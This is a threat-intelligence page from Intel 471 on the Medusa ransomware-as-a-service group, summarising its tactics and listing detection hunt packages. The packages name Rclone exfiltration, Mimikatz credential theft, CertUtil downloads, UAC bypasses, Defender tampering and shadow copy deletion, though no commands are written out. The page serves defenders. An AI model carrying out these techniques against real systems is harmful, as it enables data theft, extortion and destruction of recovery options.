Update: Medusa Ransomware | Intel 471 Skip to content

Update: Medusa Ransomware

Mar 26, 2025
Homepage slide 1

Threat Overview - Medusa Ransomware

UPDATE 03/25/2025: Since June 2021, Medusa ransomware, operating as a ransomware-as-a-service (RaaS), has been confirmed to have compromised over 300 organizations across critical infrastructure sectors, including healthcare, education, legal, insurance, technology, and manufacturing. In March of 2025, CISA released a Cybersecurity Advisory as a part of their @StopRansomware effort, offering technical details that were identified through recent FBI investigations. The actors exploit unpatched vulnerabilities in public-facing applications and often collaborate with initial access brokers to infiltrate networks. They have been observed to employ living-off-the-land techniques, leveraging legitimate system tools like PowerShell and Windows Management Instrumentation (WMI) for reconnaissance and lateral movement. Medusa affiliates deploy tools such as Mimikatz for credential harvesting and use software deployment utilities like PDQ Deploy and PsExec to distribute the ransomware payload. As mentioned in the earlier release of this collection, the ransomware encrypts data using AES-256 encryption, appends the ".medusa" extension to affected files, and deletes volume shadow copies to inhibit system recovery. In conjunction with the advisory released by CISA, threat hunters at Intel471 have updated the collection with additional Hunt Packages related to the following: 

  • Installation(and usage) of malicious tooling
  • Privilege escalation via user addition(s) to security groupings
  • Manipulation of RDP related settings to forcing a system to be more susceptible 

Prior Information: Medusa Ransomware is a variant that was believed to have emerged in June 2021 and has been becoming increasingly prolific as of late. While \u201cMedusa\u201d has been commonly used in the name of other ransomware, malware, and botnets, it is distinct from its similarly named competitors (such as MedusaLocker). The ransomware claims to exfiltrate data from compromised organizations to perform a "double-extortion attack", this is a type of attack in which the threat actor will not only encrypt compromised systems, but also sell or release the exfiltrated data publicly if a ransom is not met. Medusa Ransomware uses a .MEDUSA file extension for files it encrypts. Medusa Ransomware is considered to be an active threat, and thus poses a significant and present risk that should be ascertained and prepared for.

Medusa Ransomware Hunt Package Collection

Get your FREE Community Account today on the HUNTER Platform and get access to behavioral threat hunting content for your SIEM, EDR, NDR, and XDR platforms!

Related Hunt Packages

Rclone Activity - Potential Data Exfiltration

Rclone is a command-line tool used to manage (and potentially exfiltrate) files on cloud storage. A larger number of ransomware cases have been uncovered where Rclone has been utilized to exfiltrate files off of victim machines.
ACCESS HUNT PACKAGE


Excessive Process and Service Stop Attempts - Potential Malware Infection

Malware and Ransomware often kill legitimate services that could detect it's activities before executing their commands. This package is intended to identify excessive occurrences of a process killing services.
ACCESS HUNT PACKAGE


Enabling RDP Connections through Registry Modification

This content is designed to detect when the registry key that enabled and disables Remote Desktop protocol (RDP) connections (HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server) is modified. This type of activity has been seen in the use of the SmokedHam tool from UNC2465 and its affiliates. False positives may occur depending on the environment per company, as these registry keys can be modified by admins.
ACCESS HUNT PACKAGE


Suspicious BITS Activity - ScriptBlock

This package identifies activity in Powershell Logging associated with BITS either with bitsadmin.exe or the BITS cmdlets and module in PowerShell.
ACCESS HUNT PACKAGE


Suspicious BITS Activity

This package identifies activity associated with BITS either with bitsadmin.exe or the BITS cmdlets and module in powershell.
ACCESS HUNT PACKAGE


Possible Delayed Execution in CommandLine Argument Using Ping.exe and Loopback Address

This content is designed to detect when ping.exe contains a flag (-n) with a high number and targets any loopback address. This technique is sometimes used to delay the rest, or a chained command, of the command from executing.
ACCESS HUNT PACKAGE


SoftPerfect Network Scanner Write File Validation

This Threat Hunt package identifies the use of the SoftPerfect Network Scanning tool when leveraged to find share drives that allow write access for the user account being utilized. For additional logging requirements see Deployments Steps within tool queries.
ACCESS HUNT PACKAGE


Taskkill.exe executed multiple times in a short period

This hunt is designed to capture when taskkill.exe is used multiple times on a single endpoint or in the entire environment in a short period of time. This behavior has been observed in relation to ransomware and other malicious software or actors when they attempt to cover their tracks or to disable security software on a compromised machine.
ACCESS HUNT PACKAGE


Potential Exfiltration - Common Rclone Arguments

This will identify processes executed with common arguments associated with rclone activity used to exfiltrate.
ACCESS HUNT PACKAGE


UAC Bypass Attempt via Elevated COM Abuse

This content is designed to detect User Account Control Bypass attempts abusing common COM interfaces within the registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\UAC\\COMAutoApprovalList. These COM Objects are designed to start at a higher integrity level and can be manipulated to open another process at the same higher level.
ACCESS HUNT PACKAGE


UAC Bypass Method - Cmstplua COM (Process Execution)

This content is designed to detect when the UAC Bypass method is executed via DllHost.exe OR CMSTP.exe.
ACCESS HUNT PACKAGE


Disabling Windows Security Services via Registry Edit Methods

This hunt package is designed to identify any attempt to disable Windows security services through the modification of the Windows registry. Windows security services are crucial to maintaining the security of a system and disabling them could potentially compromise the system's security posture, allowing an attacker to run code without security protections in place.
ACCESS HUNT PACKAGE


CertUtil file download

Identify suspicious downloads with the built-in windows tool CertUtil. CertUtil is typically not utilized to download executables or files in general from the web, as such its usage to download files from the Internet should be considered suspicious.
ACCESS HUNT PACKAGE


Excessive Windows Discovery and Execution Processes - Potential Malware Installation

This package utilizes a list of commonly abused LOLB which an attacker or malware would execute in quick succession. The presence of multiple executions of the programs within the list can be indicative of an infection or malicious activity occurring on a victim host. To reduce false positives, distinct counts per process name can be utilized to ensure over 5 unique processes from the list were executed versus just checking more than 6 events were generated on the host.
ACCESS HUNT PACKAGE


Attempted Backup Deletion - Potential Ransomware Activity

This Hunt Package focuses on identifying commands associated with the deletion of backups, which is common activity among various ransomware groups. The provided hunt logic will identify processes that run commands associated with backup deletion and provide relevant context around the activity.
ACCESS HUNT PACKAGE


Volume Shadow Copy Service Disabled

This package is designed to capture the surrounding activity when the service related to Volume Shadow Copy Service is disabled.
ACCESS HUNT PACKAGE


Advanced IP Scanner Tool Utilization

This Threat Hunt package identifies instances where Advanced IP Scanner tool was used within a target environment, which may be leveraged by malicious actors to perform network discovery actions. This package can also identify activity even if the execution is run as a portable exe instead of an installation of the tool.
ACCESS HUNT PACKAGE


RDP Enabled Via NETSH

This hunt package is designed to capture the activity surrounding commandline arguments being executed in order to enable Remote Desktop Protocol (RDP).
ACCESS HUNT PACKAGES


Resize Shadow Storage with 'vssadmin'

This will identify vssadmin use to resize the shadowstorage, which is a methodology used by a few ransomware actors to increase their success to impact recovery.
ACCESS HUNT PACKAGE


User Added to Default Privileged Windows Security Groups

This package is designed to capture the activity surrounding the execution of command line arguments that add a user to default privileged Windows Security Groups (local and domain).
ACCESS HUNT PACKAGE


Suspicious bcdedit Activity - Potential Ransomware

BCDEdit is a command-line tool for managing Boot Configuration Data (BCD). Ransomware is known to utilize bcdedit to modify the boot configuration to prevent recovery. The intent of this package is to identify when bcdedit is being utilized with several common malicious commands, such as delete and safeboot.
ACCESS HUNT PACKAGE


Shadow Copies Deletion Using Operating Systems Utilities

Ransomware is known to delete Windows shadow copies before it begins encrypting the data on the victim host. This tactic is typically carried out with powershell, vssadmin or wmic. This package identifies activity by powershell, wmic, vssadmin or vssvc with command line arguments containing delete and variations of shadow. 
ACCESS HUNT PACKAGE


Common Ransomware Encrypted File Extensions

Ransomware commonly modifies the file extensions of data they have victimized during their attacks. The most common file extensions linked to Ransomware can be identified and assist in associating what variant is behind the malicious activity.
ACCESS HUNT PACKAGE


Powershell Encoded Command Execution

Looks for valid variations of the -EncodedCommand parameter. This is commonly used to encode or obfuscate commands, and not all occurrences are malicious. For example, benign complex commands may require encoding to properly run on a target system. Analysis of the encoded command by base64 decoding the encoded data will be necessary.

ACCESS HUNT PACKAGE


Windows Defender Tampering - Possible Malware Activity

This package is designed to identify when PowerShell is utilized to tamper with Windows Defender in a way that would make a machine easier to compromise.
ACCESS HUNT PACKAGE

Featured Resource
Intel 471 Logo 2024

AresLoader is a new loader malware-as-a-service (MaaS) offered by threat actors with links to Russian hacktivism that was spotted recently in the wild.